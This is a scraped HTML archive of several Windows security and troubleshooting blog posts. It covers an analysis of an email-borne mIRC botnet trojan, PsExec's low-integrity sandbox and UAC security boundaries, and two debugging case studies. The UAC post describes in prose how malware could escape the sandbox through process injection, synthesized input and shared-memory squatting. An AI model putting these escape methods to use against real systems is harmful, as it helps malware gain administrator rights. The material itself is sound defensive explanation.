I quickly ran across a string of writes to .ini files in the \Windows\System32 directory: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="335" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741371/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741371/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120966iA11D933C85B3C9A0" style="WIDTH: 622px; HEIGHT: 335px" width="622" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I’m not familiar with mIRC, but after studying the contents of the files for a few minutes I figured out that the files cause mIRC to automatically join chat channels named mp3-w4r3z and mp3-download on a chat server randomly selected from the ones stored in the Server.ini file, all of which are in the undernet.org domain. <SPAN style="mso-spacerun: yes"> </SPAN> Finally, the heart of the operation is the script.ini file, which appears to implement commands that remote users can execute, including “run.” </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> At this point I concluded that what I had installed was a very simple Botnet client. I left it running for several hours, but didn’t notice any further activity. <SPAN style="mso-spacerun: yes"> </SPAN> Surprised that the system hadn’t become an active Bot, I opened mIRC and manually connected to several of the servers listed in the Servers.ini file, but none of them had mp3-w4r3z or mp3-download channels, so they had either been shut down or hadn’t been configured, yet. 
</FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> A few days later I received a similar email, but this time Microsoft’s spam server had stripped the contents and indicated that what I had installed was Trojan-Spy.HTML.Pcard.w, but an Internet search for more information didn’t yield anything meaningful. </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="452" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741503/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741503/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120967iF72E8FD2E2DAEBB0" style="WIDTH: 498px; HEIGHT: 452px" width="498" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I’m left wondering how successfully this type of lure brings users into a Bot herder’s web. There are numerous warnings that something funny is going on, from the lack of personalization to being asked to run a program and open a port in the firewall (and on Windows Vista there’s an additional UAC elevation prompt to give administrative privileges to Postcard.jpg.exe). <SPAN style="mso-spacerun: yes"> </SPAN> The fact that this Bot herder didn’t bother with more sophistication leads me to believe that it’s still unnecessary: enough people ignore the warnings. 
</FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Users will get more wary, however, so we’re in store for craftier attacks that will fool even paranoid users. Other spam and virus emails I’ve received address me as Mark, which I assume they get from my old mark@sysinternals.com address, but there are other tricks for guessing or even obtaining a user’s name, like contact harvesting. <SPAN style="mso-spacerun: yes"> </SPAN> Exploits of zero-day and unpatched vulnerabilities can deliver malware without user interaction, and malware can use communications techniques, like proxy servers, http traffic, or outbound-initiated bidirectional connections, to avoid causing firewall popups. <SPAN style="mso-spacerun: yes"> </SPAN> <SPAN style="mso-spacerun: yes"> </SPAN> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Windows Vista’s UAC and Protected Mode IE can help mitigate attacks, but adoption will take time and even these technologies give malware <A class="" href="#" mce_href="#" target="_blank"> a lot of room to play </A> </FONT> <FONT size="3"> <FONT face="Calibri"> . <SPAN style="mso-spacerun: yes"> </SPAN> There’s work going on at Microsoft to address these threats, but there’s no silver bullet. The fight against malware continues. 
</FONT> </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:32:15 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/botnets-by-email/ba-p/723559 MarkRussinovich 2019-06-27T06:32:15Z PsExec, User Account Control and Security Boundaries https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/psexec-user-account-control-and-security-boundaries/ba-p/723551 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 12, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I introduced the -l switch to <A class="" href="#" mce_href="#" target="_blank"> PsExec </A> about a year and a half ago as an easy way to execute processes with standard-user rights from an administrative account on Windows XP. In <A class="" href="#" mce_href="#" target="_blank"> Running as Limited User – The Easy Way </A> </FONT> <FONT face="Calibri" size="3"> I described how PsExec uses the CreateRestrictedToken API to create a security context that’s a version of the one your account is using, only without membership in the local administrators group or any of the privileges, such as Debug Programs, that are assigned to administrators. <SPAN style="mso-spacerun: yes"> </SPAN> A process running with that kind of security context has the privileges and accesses of a standard user account, which prevents it from modifying system files and Registry keys or exercising privileges, like loading a device driver, that only administrators can perform. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> There’s only one catch to the virtual sandbox the restricted token creates: processes running in the sandbox are running as you, and so can read and write any files, Registry keys, and even other processes to which your account has access. 
That caveat creates major gaps in the walls of the sandbox and malicious code written with awareness of the restricted environment could take advantage of them to escape and become full administrator. An easy way out is for the malware to simply use OpenProcess to gain access to one of your processes running outside the sandbox and to inject into it code and a thread to execute the code. Because your other processes are running as you and the Windows security model creates default permissions that grant your account full access to your processes, a sandboxed process will be able to open them. Another way out is to send window messages from the limited process to a normal process, like Explorer, and drive the normal process with synthesized mouse and keyboard input so that it executes code at the direction of the malware. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Given these holes, why do I still recommend using the PsExec feature to run processes with limited rights on Windows XP if you would rather use an administrator account instead of a standard user account? Because this type of sandbox has not been commonly used, malware authors haven’t bothered with writing the code necessary to escape and so they run into the walls. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Windows Vista changes that, however, because it uses an enhanced form of this sandbox in User Account Control (UAC) and Protected Mode Internet Explorer (IE). Let’s look at Vista’s version of the sandbox, how PsExec’s update lets you run programs in it, and explore its security implications. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> UAC creates an alternate model where all users, including administrators, run with standard user rights. 
Executables that require administrative rights include a requestedExecutionLevel key in their manifest - XML embedded in their executable - that specifies “requireAdministrator”. When an administrator executes such an image, in its default configuration UAC presents a Consent dialog that asks permission for the image to run with administrative rights. Standard users see a similar dialog, but must enter the credentials of an administrative account to unlock administrative rights. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The act of giving an executable administrative rights is called “elevation” in UAC. Whether you elevate from a standard user account (Over the Shoulder – OTS - elevation) or from an administrative account (Admin Approval Mode – AAM - elevation), you create processes that have administrative rights on the same desktop as those that have standard user rights. <SPAN style="mso-spacerun: yes"> </SPAN> Processes elevated from a standard user account run in a different account from those with standard user rights, so the Windows security model defines a wall around the elevated process that prevents the non-elevated processes from writing code into those that are elevated. However, the standard Windows security model <SPAN style="mso-spacerun: yes"> </SPAN> does not prevent non-elevated processes from sending fake input into elevated processes, nor does it create a sandbox around the non-elevated processes of administrative users to stop the processes from compromising the administrator’s elevated processes. Windows Vista therefore introduces the Windows Integrity mechanism, which supplies additional fencing for the sandbox surrounding less-privileged processes. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In Vista’s integrity model, every process runs at an integrity level (IL) and every securable object has an integrity level. 
The primary integrity levels are low, medium (the default), high (for elevated processes) and system. The windowing system honors integrity levels to prevent lower-IL processes from sending all but a few informational window messages to the windows owned by processes of a higher IL, calling this protection User Interface Privilege Isolation (UIPI). The security model also changes in Vista to only allow a process to open an object for write access if the process IL is equal to or higher than that of the object. Further, to prevent access to secrets stored in memory, processes can’t open processes of a higher IL for read access. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> If you add the Integrity Level column to Process Explorer’s display, as seen in the screenshot below, you can see that system processes, including Windows service processes, run at System IL. Most processes of your logon session run at Medium, any processes you elevated are at High, and Internet Explorer (IE) runs at Low when you have Protected Mode enabled. You can use the built-in icacls.exe utility to view and change the ILs of files and directories and the Sysinternals <A class="" href="#" mce_href="#" target="_blank"> AccessChk </A> </FONT> <FONT face="Calibri" size="3"> tool shows ILs of files, directories, registry keys, and processes. Objects have a default IL of medium and you can use AccessChk’s -e option to search for objects that have an explicit IL. 
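<BR /> The integrity rules described above can be modeled in a few lines of Python. This is only a sketch of the policy as stated in the text, not of how Windows implements it: the IL enum, its numeric values (chosen only to give the right ordering) and the three function names are illustrative assumptions.

```python
from enum import IntEnum


class IL(IntEnum):
    """Primary integrity levels; the numbers only encode the ordering."""
    LOW = 1
    MEDIUM = 2   # default for processes and objects
    HIGH = 3     # elevated processes
    SYSTEM = 4


def can_write_object(process_il, object_il):
    # Write access requires a process IL equal to or higher than the object's.
    return process_il >= object_il


def can_read_process(opener_il, target_il):
    # Processes can't open processes of a higher IL for read access.
    return opener_il >= target_il


def can_send_window_message(sender_il, receiver_il, informational=False):
    # UIPI blocks all but a few informational messages sent to higher-IL windows.
    return informational or sender_il >= receiver_il


if __name__ == "__main__":
    # A low-IL process (such as Protected Mode IE) against a default medium-IL object.
    print(can_write_object(IL.LOW, IL.MEDIUM))
    print(can_write_object(IL.LOW, IL.LOW))
```

Note that the model has no rule for reading ordinary objects: apart from processes and threads, the integrity wall only restricts writes.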
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="377" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638306/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638306/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120960iB1C4CCA04EC05C11" style="WIDTH: 528px; HEIGHT: 377px" width="528" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The new version of PsExec </FONT> <FONT face="Calibri" size="3"> takes advantage of the enhanced Vista sandbox when you specify the -l switch, running the executable you specify with a standard user token at low IL. The sandbox PsExec creates is almost identical to the one surrounding Protected Mode IE and you can feel your way around the walls by launching a command prompt or Regedit at low IL and then seeing what you can modify. 
<SPAN style="mso-spacerun: yes"> </SPAN> For example, I launched the command prompt seen below at low IL with this command: psexec -l -d cmd.exe </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> <SPAN style="mso-spacerun: yes"> <FONT face="Calibri" size="3"> <IMG height="420" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638307/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638307/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120961i2506D8C21006830B" style="WIDTH: 467px; HEIGHT: 420px" width="467" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I first determined my profile’s temporary directory with the “set” command. When I tried to create a file in that directory I was denied access because the directory has a default IL of Medium, which is indicated by the fact that there’s no IL specified in Icacls’ output. Then I changed to Protected Mode IE’s temporary directory, which has an IL of Low, and successfully created a file. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As you experiment you’ll find that your actions are limited, but there are some design boundaries that you should be aware of. First, with the exception of processes and threads, the wall doesn’t block reads. That means that your low-IL command prompt or Protected Mode IE can read objects that your account (the standard-user version if you’re a member of the Administrators group) can. This potentially includes a user’s documents and registry keys. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Even the ability of a process at low IL to manipulate objects of a higher IL isn’t necessarily prevented. 
Since processes running at different integrities are sharing the same desktop they share the same “session”. <SPAN style="mso-spacerun: yes"> </SPAN> Each user logon results in a new session in which the processes of the user execute. The session also defines a local namespace through which the user’s processes can communicate via shared objects like synchronization objects and shared memory. That means that a process with a low IL could create a shared memory object (called a section or memory-mapped file) that it knows a higher IL process will open, and store data in the memory that causes the elevated process to execute arbitrary code if the elevated process doesn’t properly validate the data. That kind of escape, called a squatting attack, is sophisticated, requires the user to execute processes in a specific order and requires knowledge of the internal operation of an application that is susceptible to manipulation through shared objects. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> However, let’s be clear that no matter how difficult to pull off, the mere possibility of such a breach of a sandbox wall implies that ILs, in and of themselves, do not define security boundaries. <SPAN style="mso-spacerun: yes"> </SPAN> What’s a security boundary? It’s a wall through which code and data can’t pass without the authorization of a security policy. User accounts running in separate sessions are separated by a Windows security boundary, for example. One user should not be able to read or modify the data of another user, nor be able to cause other users to execute code, without the permission of the other user. If for some reason it was possible to bypass security policy, it would mean that there was a security bug in Windows (or third-party code that allows it). 
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> It should be clear, then, that neither UAC elevations nor Protected Mode IE define new Windows security boundaries. Microsoft has been communicating this but I want to make sure that the point is clearly heard. Further, as Jim Allchin pointed out in his blog post <A class="" href="#" mce_href="#" target="_blank"> Security Features vs Convenience </A> , </FONT> <FONT size="3"> <FONT face="Calibri"> Vista makes tradeoffs between security and convenience, and both UAC and Protected Mode IE have design choices that required paths to be opened in the IL wall for application compatibility and ease of use. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Not requiring a user to type Ctrl+Alt+Delete to verify the authenticity of the credential dialog that UAC presents for an OTS elevation is one example of security balanced against usability, but there are others, like the ones I describe in my TechEd/ITForum talk <A class="" href="#" mce_href="#" target="_blank"> User Account Control Internals and Impact on Malware </A> </FONT> <FONT size="3"> <FONT face="Calibri"> (Jim’s post describes some of the ways you can enhance security while tipping the balance against ease of use, like configuring Windows to require Ctrl+Alt+Delete for the credential dialog). For instance, having your elevated AAM processes run in the same account as your other processes gives you the convenience of allowing your elevated processes access to your account’s code and data, but at the same time allows your non-elevated processes to modify that same code and data to potentially cause an elevated process to load arbitrary code. 
<SPAN style="mso-spacerun: yes"> </SPAN> <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri"> <FONT size="3"> Because elevations and ILs don’t define a security boundary, potential avenues of attack, regardless of ease or scope, are not security bugs. So if you aren’t guaranteed that your elevated processes aren’t susceptible to compromise by those running at a lower IL, why did Windows Vista go to the trouble of introducing elevations and ILs? To get us to a world where everyone runs as standard user by default and all software is written with that assumption. </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri"> <FONT size="3"> Without the convenience of elevations most of us would continue to run the way we have on previous versions of Windows: with administrative rights all the time. Protected Mode IE and PsExec’s -l option simply take advantage of ILs to create a sandbox around malware that gets past other security defenses. The elevation and Protected Mode IE sandboxes might have potential avenues of attack, but they’re better than no sandbox at all. <SPAN style="mso-spacerun: yes"> </SPAN> If you value security over any convenience you can, of course, leverage the security boundary of separate user accounts by running as standard user all the time and switching to dedicated accounts for unsafe browsing and administrative activities. 
<SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Look for my in-depth article on UAC internals in the June issue of TechNet Magazine, and if you want to learn about other changes in Windows Vista then&nbsp;check out the first of my three-part <A class="" href="#" mce_href="#" target="_blank"> Inside the Vista Kernel </A> </FONT> <FONT face="Calibri" size="3"> article series in the February issue of TechNet Magazine. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:31:31 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/psexec-user-account-control-and-security-boundaries/ba-p/723551 MarkRussinovich 2019-06-27T06:31:31Z The Case of the Mysterious Code Signing Failures https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-code-signing-failures/ba-p/723548 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 11, 2006 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I <A class="" href="#" mce_href="#" target="_blank"> digitally sign code </A> on a regular basis in the course of preparing Sysinternals executables for upload to the site. When you digitally sign a file, you encrypt the hash of the file with the private key of a public/private key pair. Someone can verify that you’ve signed the file by decrypting the encrypted hash with your public key and comparing the result with the hash of the file they calculate themselves. <SPAN style="mso-spacerun: yes"> </SPAN> The signing process is made simple with <A class="" href="#" mce_href="#" target="_blank"> Signtool.exe </A> , a utility that comes with the Platform SDK and the .NET Framework. You pass it your signing certificate, private key file, and target file as command-line arguments and it does the rest, appending the signed hash to the file as a final step. 
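</FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The sign-and-verify flow described above can be sketched in a few lines of Python. This is a toy illustration only: it assumes a tiny textbook RSA key, and the constants and the helper names digest, sign, and verify are made up for the example. It is not how Signtool is implemented, and real code signing uses large keys, padding, and certificates. </FONT> </P>

```python
import hashlib

# Toy textbook RSA key, far too small for real use (illustrative assumption).
P, Q = 61, 53
N = P * Q                            # public modulus
E = 17                               # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))    # private exponent (needs Python 3.8+)


def digest(data: bytes) -> int:
    """Hash the file contents and reduce the hash to fit the toy modulus."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N


def sign(data: bytes) -> int:
    """'Encrypt' the hash with the private key."""
    return pow(digest(data), D, N)


def verify(data: bytes, signature: int) -> bool:
    """'Decrypt' the signature with the public key and compare the hashes."""
    return pow(signature, E, N) == digest(data)


if __name__ == "__main__":
    image = b"contents of a hypothetical executable"
    signature = sign(image)
    print(verify(image, signature))
```

<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In the sketch, only the holder of the private exponent can produce a value that verifies against the public pair, which is the property the verification step relies on. 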
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The other day I went to sign an updated Sysinternals tool and ran into this error message: </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551778/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551778/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120956i54909C8F5DA7ABA3" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> It had been a week or so since the last time I had tried signing anything, but I couldn’t think of any changes I had made to the system that would have led to this failure. <SPAN style="mso-spacerun: yes"> </SPAN> However, anyone who’s used computers for any length of time knows that they’re not really deterministic and that system configuration is often subject to spontaneous corruption. I resigned myself to never knowing the root cause and set out to resolve the problem. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The first thing I did was search for capicom.dll with the built-in Where utility, which looks for the file you specify in each of the directories listed in the PATH environment variable. 
The PATH environment variable is used for DLL searches, so I expected this step to confirm that I was missing Capicom.dll: </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551779/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551779/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120957i5B0BDB8DF25BFF28" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The output appeared to confirm it, but then I realized that because I was running on a 64-bit system and Signtool is a 32-bit executable, Where.exe wouldn’t look in the %SystemRoot%\Syswow64 directory, which is the directory in which 32-bit system DLLs are stored. When I manually looked in that directory I was surprised to find a copy of Capicom.dll: </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551780/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551780/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120958iF204A4B4D3C38047" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Signtool must therefore not be looking for Capicom.dll in the directories listed in the PATH environment variable, so the question before me was, where was Signtool looking? 
I knew <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> was the perfect tool to answer a question like that, so I ran it, configured an Include filter for any Path ending in “capicom.dll” and then repeated the Nmake command that triggered the error: <SPAN style="mso-no-proof: yes"> </SPAN> </FONT> </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551782/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551782/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120959i314A790D2CE3D4B5" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The trace shows that, for some reason, Signtool only looks for Capicom.dll in two directories: <SPAN style="mso-spacerun: yes"> </SPAN> the Microsoft Shared sub-directory of the system’s Common Files directory, and the \Bin directory, which is where Signtool is located on my system. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To fix the problem I simply copied the Capicom.dll file from the \Windows\Syswow64 directory to the \Bin directory. I reran the make command&nbsp;and, as I expected, it succeeded. Process Monitor to the rescue! 
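</FONT> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The difference between what Where checks and what Signtool checked can be sketched as follows. This is a minimal illustration in Python, assuming hypothetical helpers named find_in_dirs and where. The two hard-coded directories are stand-ins for the locations seen in the Process Monitor trace, not Signtool’s actual code or exact paths. </FONT> </P>

```python
import os


def find_in_dirs(filename, directories):
    """Return every existing path to filename in the given directories."""
    hits = []
    for directory in directories:
        candidate = os.path.join(directory, filename)
        if os.path.isfile(candidate):
            hits.append(candidate)
    return hits


def where(filename):
    """Mimic the Where utility: walk the directories listed in PATH."""
    path_dirs = os.environ.get("PATH", "").split(os.pathsep)
    return find_in_dirs(filename, [d for d in path_dirs if d])


if __name__ == "__main__":
    # Hypothetical stand-ins for the two directories Signtool probed.
    fixed_dirs = [r"C:\Program Files\Common Files\Microsoft Shared", r"C:\Bin"]
    print(where("capicom.dll"))
    print(find_in_dirs("capicom.dll", fixed_dirs))
```

<P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A file can be present in a directory on one list and still be invisible to a program that consults only the other list, which is why copying the DLL into \Bin resolved the failure. 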
</FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:31:13 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-code-signing-failures/ba-p/723548 MarkRussinovich 2019-06-27T06:31:13Z The Case of the Delayed Windows Vista File Open Dialogs https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-delayed-windows-vista-file-open-dialogs/ba-p/723543 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 27, 2006 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I was in Barcelona a couple of weeks ago speaking at Microsoft’s TechEd/ITForum conference, where I delivered several sessions (two, Advanced Malware Cleaning and Windows Vista Kernel Changes earned the top #1 and #2 rated breakout sessions for the week - you can see an interview of me at the conference <A class="" href="#" mce_href="#" target="_blank"> here </A> </FONT> <FONT face="Calibri" size="3"> ). The conference was a huge success and Windows Vista, which I had taken on the road for the first time, performed great. However, as I was running through some demos before one of my sessions, I noticed that the file open dialog, which is common to all Windows applications, would often take between 5 and 15 seconds to appear. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I didn’t have time to investigate before my talk, so the delays caused me consternation when they showed up during my Windows Vista Kernel Changes session immediately afterward. The behavior felt uncannily like the one I wrote up a few blog posts ago in <A class="" href="#" mce_href="#" target="_blank"> The Case of the Process Startup Delays </A> . In that case, Windows Defender’s Remote Procedure Call (RPC) communications during process startup tried to contact a domain controller, which resulted in hangs when the system was disconnected from its domain. 
I mumbled excuses on behalf of Windows Vista and tried to distract the audience by explaining the subsequent demonstrations. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> It wasn’t until the plane ride home that I got a chance to look into it. I followed steps similar to the ones I had followed when I explored the Windows Defender hangs. I launched Notepad from within <A class="" href="#" mce_href="#" target="_blank"> Debugging Tools for Windows </A> ’ Windbg tool, typed Ctrl+O to open the File Open dialog, and when the hang occurred I broke in and looked at the stack of Notepad’s main thread: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532468/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120949i205AA41B367810C1" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> If you haven’t seen a stack before, it’s a history, from most recent to least recent, of the nested functions called by a thread. You read it from bottom to top, so the stack shows that Notepad had loaded Browseui.Dll and called its CAddressBand::SetNavigationState function. That function called CBreadcrumbBar::SetNavigationState, which called CBreadcrumbBar::SetIDList, and so on. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A look at the function names on the stack immediately told me what was happening: when you access the Open dialog the first time within an application it navigates to your documents folder. 
On Windows Vista my folder is C:\Users\Markruss\Documents, but the shell wants to make the path in the dialog’s new “bread crumb” bar pretty by displaying it as “Mark Russinovich\Documents”, and so it calls <A class="" href="#" mce_href="#" target="_blank"> GetUserNameEx </A> to look up my account’s display name as it’s stored in my User object in Active Directory. I confirmed my theory by verifying that the first parameter SHGetUserDisplayName passes to GetUserNameEx, which is interpreted as the <A class="" href="#" mce_href="#" target="_blank"> EXTENDED_NAME_FORMAT </A> enumeration, is 3: NameDisplay. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I set a breakpoint on the call’s return and hit it after the delay completed. GetUserNameEx returned the ERROR_NO_SUCH_DOMAIN error code, and stepping through SHGetUserDisplayName revealed that it falls back to calling <A class="" href="#" mce_href="#" target="_blank"> GetUserName </A> . Instead of looking up the user’s display name, that function just obtains the Security Identifier (SID) of the user from the process token (the kernel data structure that defines the owner of a process) and calls LookupAccountSid to translate the SID to its account name, which in my case is simply “markruss”. 
Thus, the dialog that appeared looked like this: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532469/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120950i782B811E035F2FA6" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As opposed to this, which is what I saw when I got back to the office and connected to the corporate network: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532470/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120951iA221F03BC51F514D" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I had solved the case, but was curious to know where exactly the delay was taking place and so continued by researching what was happening on the other end of the Secur32!CallSPM call that’s on top of the stack listing. I knew that the Local Security Authority (LSASS) process is responsible for authentication, including interactions with domain controllers and account name translations, so I attached Windbg to the Lsass.exe process (make sure that you detach the debugger from LSASS with the “qd” command before exiting, otherwise LSASS will terminate and the system will begin a 30-second shutdown). I figured that Secur32.Dll acts like both a client and server and confirmed that it was loaded into LSASS, but I needed to determine the server-side function that corresponds to Secur32!SecpGetUserName. 
